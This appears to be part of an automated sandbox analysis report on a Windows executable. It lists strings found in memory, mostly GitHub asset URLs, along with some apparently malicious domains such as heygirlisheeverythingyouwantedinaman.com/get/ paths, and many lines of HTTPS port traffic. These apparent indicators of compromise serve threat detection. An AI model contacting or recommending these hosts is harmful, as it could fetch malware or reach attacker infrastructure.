                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_g
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-cbcee078
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-5e0904652c1c.j
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_react-code-view_components_directory_Direc
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/behaviors-bde2e016b2b8.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/code-ac2c2f3d57f1.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/code-menu-2658b004279a.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark-a167e256da9c.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-d11f2cf8009b.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-ea7373db06c8.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-9b32204967c6.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/element-registry-58eba3853ad3.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/environment-4ff0d843ea45.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-8eaab228448a.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-elements-91586b615d25.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/global-05ed4a7e07b5.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-9b7386ec0bee.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light-0eace2597ca3.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_colorblind-af6c685139ba.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-578cdbc8a5a9.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-5cb699a7e247.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/notifications-global-99d196517b1b.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/primer-08e422afeb43.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/primer-primitives-2ef2a46b27ee.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/react-code-view-ca607a3ccbc3.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/react-lib-1fbfc5be2c18.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/repository-6247ca238fd4.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/sessions-1164ee5f3e37.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-ch
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-afaa9a250f2e.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_paths_index_ts-6ac43f859e31.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_register-app_ts-f7fc9821bc0f.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-858bb94813b1.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-72c9fbde5ad4.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-6890e890956f.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_hotkey_dist_index_js-node_modules
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_hydro-analytics-client_dist_analy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c9
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-5bff297a06
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_scroll-into-vi
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMe
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-no
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-ebfceb11
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-05
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_j
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_js-node_modu
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_FormControl_FormCon
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_PageLayout_PageLayo
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_m
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TreeView_TreeView_j
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_react-router-dom_dist_index_js-3b41341d5
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parse
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/wp-runtime-0abd42484719.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.png
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996D49000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heygirlisheeverythingyouwantedinaman.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A40E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heygirlisheeverythingyouwantedinaman.com/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996DB2000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heygirlisheeverythingyouwantedinaman.com/get/65d7a6204771942
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heygirlisheeverythingyouwantedinaman.com/get/65d7a62047719422e5d0b85e
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199984E000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heygirlisheeverythingyouwantedinaman.com:443
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119948D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heygirlisheeverythingyouwantedinaman.com:443/index.php
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A6C3000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AA74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ktxcomay.com.vn
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994123000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.zscalerthree.net/img_logo_new1.png
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.zscalertwo.net/img_logo_new1.png
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://opengraph.githubassets.com/d510eef56fcf493b530c4a642192e5f13277b0cfc3a3219696e7493197a5e205/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://partner.github.com/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF704000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF779000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2449218733.00000119AE07E000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF7E2000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AC2C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF686000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2449218733.00000119ADFF0000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF652000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF69A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998353000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repository.gij.edu.gh
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resources.github.com/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resources.github.com/devops/fundamentals/devsecops/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resources.github.com/learn/pathways/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skills.github.com/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.github.com?tags=dotcom-footer
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://user-images.githubusercontent.com/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.githubstatus.com/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199994A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55509
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51387
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51384
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55504
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53325
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51389
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55114 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50664 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52077 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50502
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50501
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50504
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54367 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50503
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53374 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51869 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52249 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52244
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55119 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52644 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53511 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53775 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53331
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52249
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55995
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53941 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52251
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53505 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53769 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54511 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54884 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53229
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53375 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55428 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52084 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53224
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52256
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52061 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53227
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53512 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52616 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53231
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53936 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54321 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54499 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51855
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54329
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54323
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53233
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53232
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54321
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53236
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54325
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53231 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54270 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53240
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51387 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50665 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51381 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53769
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54257 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55548 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52082 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55268
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55130 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55395
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53229 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53093
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54503 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55345 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54323 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54989
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55362 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55471 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53773
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52087 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50501 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54503
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55003 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53775
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52059 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53939 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53309
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52626 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54511
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51864 -> 443
